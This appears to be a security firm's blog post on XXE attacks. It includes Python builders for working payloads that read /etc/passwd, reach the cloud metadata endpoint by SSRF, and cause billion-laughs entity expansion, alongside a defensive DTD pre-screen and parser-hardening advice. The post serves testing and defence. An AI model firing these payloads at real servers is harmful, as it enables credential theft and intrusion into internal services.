Simuna Infosec
Technical | 2026-10-14

XML External Entity (XXE) Attacks: Server-Side File Reading and SSRF for Thai Organizations

XXE vulnerabilities in XML parsers can expose server files, enable SSRF, and cause denial of service. Guidance for the Thai market.

XML External Entity (XXE) vulnerabilities arise when an XML parser resolves entity declarations in the DOCTYPE of attacker-supplied input. A successful attack can read arbitrary files from the server (including configuration files and credentials), perform server-side request forgery against internal services and cloud metadata endpoints, cause denial of service through nested entity expansion (the 'billion laughs' attack, which needs no external entity at all), and in rare configurations achieve remote code execution. XXE is particularly relevant in enterprise applications that process XML for data exchange, SOAP web services, document upload and processing (DOCX, XLSX and SVG are XML containers), and legacy integration endpoints.

Testing involves submitting crafted XML payloads with external entity declarations to every XML processing endpoint and evaluating whether the parser resolves them. A response that does not echo the entity's content does not prove the parser is safe: blind XXE can still be confirmed out of band, for example by pointing the entity at a URL on a host the tester controls and watching for the request. The fix belongs in parser configuration, not in input filtering: disable DTD processing entirely where the application does not need it, and otherwise disable external entity and external DTD resolution.
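The three payload classes described above, and the server-side screen that rejects them, as an added example written for this post (not code from Simuna Infosec). It uses only the Python standard library; the element names `order` and `customerId`, the file path and the metadata URL are hypothetical placeholders. Note that Python's expat-based `ElementTree` does not fetch external entities on its own, so the payload builders here are what a tester sends to some other endpoint, while `analyze_dtd` shows how a gatekeeper can compute the worst-case expansion of a DTD's internal subset and flag SYSTEM/PUBLIC entities before the real parser ever sees them.

```python
"""XXE test payloads and a DTD pre-screen (added example; standard library only)."""
import re
import xml.etree.ElementTree as ET

# ------------------------------------------------------------------ payloads --
# Element names, paths and URLs are hypothetical placeholders for illustration.
def file_read_payload(path="/etc/passwd", root="order", field="customerId"):
    """Classic XXE: an external entity pointing at a local file, referenced in a
    field the application echoes back in its response."""
    return ('<?xml version="1.0"?>\n'
            f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
            f'<{root}><{field}>&xxe;</{field}></{root}>')

def ssrf_payload(url="http://169.254.169.254/latest/meta-data/", root="order", field="customerId"):
    """XXE as SSRF: the SYSTEM identifier is a URL only the server can reach."""
    return ('<?xml version="1.0"?>\n'
            f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{url}">]>\n'
            f'<{root}><{field}>&xxe;</{field}></{root}>')

def billion_laughs_payload(depth=10, fanout=10):
    """Nested internal entities: the top entity expands to fanout**depth copies of 'lol'."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for i in range(1, depth + 1):
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
        prev = f"lol{i}"
    dtd = "<!DOCTYPE lolz [\n  " + "\n  ".join(decls) + "\n]>"
    return f'<?xml version="1.0"?>\n{dtd}\n<lolz>&{prev};</lolz>'

# ---------------------------------------------------------------- pre-screen --
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s+)?(?P<name>[\w.:-]+)\s+'
    r'(?P<kind>SYSTEM|PUBLIC|"[^"]*"|\'[^\']*\')',
    re.S,
)
REF_RE = re.compile(r"&([\w.:-]+);")

def analyze_dtd(xml_text):
    """Return (names of external entities, worst-case expansion in characters
    of any internal entity). Parameter entities (%) are included."""
    external, internal = [], {}
    for m in ENTITY_RE.finditer(xml_text):
        kind = m.group("kind")
        if kind in ("SYSTEM", "PUBLIC"):
            external.append(m.group("name"))
        else:
            internal[m.group("name")] = kind[1:-1]   # strip the surrounding quotes

    memo = {}
    def expanded_len(name, stack=()):
        if name in stack:                 # self-reference is illegal XML; treat as unbounded
            return float("inf")
        if name in memo:
            return memo[name]
        value = internal.get(name)
        if value is None:                 # predefined (&amp;) or undeclared: count literally
            return len(name) + 2
        total, pos = 0, 0
        for ref in REF_RE.finditer(value):
            total += ref.start() - pos + expanded_len(ref.group(1), stack + (name,))
            pos = ref.end()
        total += len(value) - pos
        memo[name] = total
        return total

    worst = max((expanded_len(n) for n in internal), default=0)
    return external, worst

def classify(xml_text, max_expansion=1_000_000):
    """Label a request body: 'clean', 'external-entity', 'entity-expansion' or 'dtd'."""
    if not DOCTYPE_RE.search(xml_text):
        return "clean"
    external, worst = analyze_dtd(xml_text)
    if external:
        return "external-entity"
    if worst > max_expansion:
        return "entity-expansion"
    return "dtd"                          # looks harmless, but the strict policy still rejects it

def safe_parse(xml_text):
    """Parse untrusted XML only when it carries no DTD at all. The screen is a
    policy decision independent of the parser: stacks that resolve external
    entities by default or when misconfigured are protected the same way."""
    label = classify(xml_text)
    if label != "clean":
        raise ValueError(f"rejected XML request body: {label}")
    return ET.fromstring(xml_text)

if __name__ == "__main__":
    for name, body in [("file read", file_read_payload()), ("ssrf", ssrf_payload()),
                       ("billion laughs", billion_laughs_payload())]:
        print(f"{name:15s} -> {classify(body)}  (worst expansion: {analyze_dtd(body)[1]:,})")
```

The expansion figure is the useful part of the triage output: a ten-deep, ten-wide 'billion laughs' document is under 1 KB on the wire but declares an entity that expands to 3 x 10^10 characters, which is exactly the amplification ratio modern parsers such as libexpat now cap. Where the application genuinely needs a DTD, keep `analyze_dtd` as a logging aid but still turn off external entity resolution in the parser itself.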